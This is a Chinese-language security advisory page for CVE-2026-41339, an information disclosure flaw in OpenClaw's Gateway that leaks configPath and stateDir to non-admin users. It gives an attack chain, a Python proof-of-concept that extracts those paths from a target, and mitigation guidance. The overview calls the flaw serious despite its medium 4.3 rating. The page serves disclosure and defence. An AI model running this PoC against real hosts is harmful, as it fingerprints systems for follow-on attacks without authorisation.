CVE-2026-41339 CVSS 4.3 中危

CVE-2026-41339 OpenClaw信息泄露漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41339

漏洞类型

信息泄露

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

OpenClaw

漏洞概述

OpenClaw 2026.4.2 之前的版本存在一处严重的信息泄露漏洞。当非管理员权限的客户端尝试连接 Gateway 并成功建立连接时，服务器返回的快照数据中意外包含了 `configPath` 和 `stateDir` 等敏感元数据。攻击者可以利用这一缺陷，无需管理员权限即可恢复主机特定的文件系统路径以及详细的部署信息。这种信息暴露使得攻击者能够精准识别主机指纹，从而为后续发起针对性的链式攻击提供了重要的情报支持。

技术细节

该漏洞的根本原因在于 OpenClaw 在处理 Gateway 连接成功后的响应快照时，未对不同权限级别的用户实施严格的数据过滤机制。在受影响版本中，系统默认将内部的配置路径（`configPath`）和状态存储目录（`stateDir`）包含在返回给客户端的 JSON 响应对象中。虽然这需要攻击者拥有一个有效的低权限账户并进行认证（PR:L），但一旦认证通过，攻击者即可通过解析 HTTP 响应内容提取这些绝对路径。由于文件系统路径往往暴露了底层的操作系统结构（如 Windows 或 Linux 的目录特征）以及应用程序的具体部署架构，攻击者可以利用这些信息推断服务器环境，缩小后续漏洞利用的搜索范围，并结合其他漏洞（如路径遍历）实施更复杂的攻击链。此问题属于典型的权限隔离失效导致的信息泄露。

攻击链分析

STEP 1

步骤1

攻击者获取非管理员级别的有效凭证，登录 OpenClaw 系统。

STEP 2

步骤2

攻击者向 Gateway 接口发起连接请求，触发服务器返回连接成功的快照数据。

STEP 3

步骤3

攻击者解析响应快照，提取其中的 `configPath` 和 `stateDir` 字段。

STEP 4

步骤4

基于获取到的文件路径信息，识别主机操作系统指纹及部署结构，规划后续的链式攻击。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL (Replace with actual target)
target_url = "http://target-openclaw-instance/api/gateway/connect"

# Credentials for a non-admin user (Replace with valid credentials)
auth_data = {
    "username": "low_priv_user",
    "password": "password123"
}

try:
    # Send request to connect to gateway
    response = requests.post(target_url, json=auth_data)

    if response.status_code == 200:
        data = response.json()
        # Check if snapshot contains sensitive paths
        if "snapshot" in data:
            snapshot = data["snapshot"]
            config_path = snapshot.get("configPath")
            state_dir = snapshot.get("stateDir")

            print("[+] Information Disclosure Detected!")
            print(f"Config Path: {config_path}")
            print(f"State Dir: {state_dir}")
        else:
            print("[-] No snapshot data found in response.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")

except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

OpenClaw < 2026.4.2

防御指南

临时缓解措施

建议立即升级至 OpenClaw 2026.4.2 或更高版本。若暂时无法升级，应严格限制非管理员用户对 Gateway 连接接口的访问权限，并在网络边界部署 WAF 规则，检测并拦截包含敏感路径信息的异常响应数据，防止信息泄露。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表